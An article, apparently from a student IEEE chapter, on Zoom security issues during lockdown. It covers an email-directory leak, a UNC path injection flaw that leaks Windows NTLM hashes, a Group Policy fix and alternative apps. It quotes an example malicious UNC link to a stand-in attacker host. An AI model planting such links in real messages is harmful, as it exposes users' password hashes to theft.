IS THE ZOOM APP SAFE ENOUGH???

Article by Arul Dharshan for IEEE-SPS, VIT

Zoom video conferencing has been the most buzzing app in this lockdown be starting from meetings to online classes. Due to the ongoing lockdown globally, Zoom’s popularity quickly shot up too.

Email addresses, profile photos leak

Users who share the same email domain will find their email addresses in a universal company folder which is visible to all the members. This doesn’t work for major email clients like Gmail, Yahoo, Hotmail, or Outlook. But this isn’t the case for users who use small email clients. It happened to Dutch Zoom users who could see information like email addresses, usernames, and even photos of them and others in the company folder. These users reportedly used ISP-provided email addresses.

Here’s how Attackers could steal Windows passwords from ZOOM:

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention(UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.

Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file-sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Remedy Until Zoom makes a fix

The issue needs to be fixed by Zoom but until then, you can enable a group policy that prevents NTML credentials from automatically being sent as described. You can find this under Group Policy editor, and change it to “Deny All.”

Go to Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers.

ALTERNATIVES CONFERENCING APPS FOR USERS:

Cisco Webex Meetings

Cisco is offering free access to its Webex Meetings in all countries where it is available to support the work from home needs during the coronavirus outbreak.

Skype Meet Now

Microsoft recently brought Skype Meet Now which serves as an alternative to Zoom. It works without requiring an account and supports up to 50 participants — all for free.

Microsoft Teams

If you don’t want a solution just to make video calls, you can look at Microsoft Teams. It is also available for free during the pandemic. The free version brings unlimited chat and search, group and one-on-one audio, and video calling.

Google Hangouts

You can make video calls with up to 10 participants or chat with up to 150 participants at once. Google also lets you host video calls or talk with your colleagues through text messages using a mobile device.